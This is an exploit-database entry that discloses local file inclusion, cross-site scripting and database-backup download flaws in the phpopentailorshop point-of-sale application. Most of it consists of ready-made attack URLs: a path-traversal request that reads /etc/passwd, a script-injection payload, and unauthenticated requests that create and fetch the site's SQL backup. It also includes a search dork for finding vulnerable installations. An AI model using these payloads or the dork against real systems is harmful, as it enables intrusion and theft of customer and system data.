phpopentailorshop Multiple Vulnerabilities



EKU-ID: 215 CVE: OSVDB-ID:
Author: Cyber-security Published: 2011-05-12 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: phpopentailorshop Multiple Vulnerabilities
# Author: Cyber-security   
# Software Link: http://www.phppointofsale.com/
# Category:: Multiple Vulnerabilities
# d0rk: intext: "Powered by PHP Point of Sale"
# Tested on: Windows XP SP3
________                     ________.__                    __  
\______ \ ________          /  _____/|  |__   ____  _______/  |_
|    |  \\___   /  ______ /   \  ___|  |  \ /  _ \/  ___/\   __\
|    `   \/    /  /_____/ \    \_\  \   Y  (  <_> )___ \  |  | 
/_______  /_____ \          \______  /___|  /\____/____  > |__| 
        \/      \/                 \/     \/           \/       
---LFI---
http://localhost/phpopentailorshop/login.php?cfg_language=../../../../etc/passwd%00
---XSS---
http://localhost/phpopentailorshop/customers/customers_barcode.php?generateWith=<script>alert(0)</script>
---Download Backup Vulnerability---

Verser le démarrage de sauvegarde

http://localhost/phpopentailorshop/backupDB.php?StartBackup=4

url de backup

http://localhost/phpopentailorshop/backupDB.php?nohtml=1

File saved to D:\AppServ\www\phpopentailorshop/backups/.db_backup.2011-05-11.sql.gz.

thank to: all hacker algerian
saoucha - indoushika - TheBlind747 - N2N - Kader11000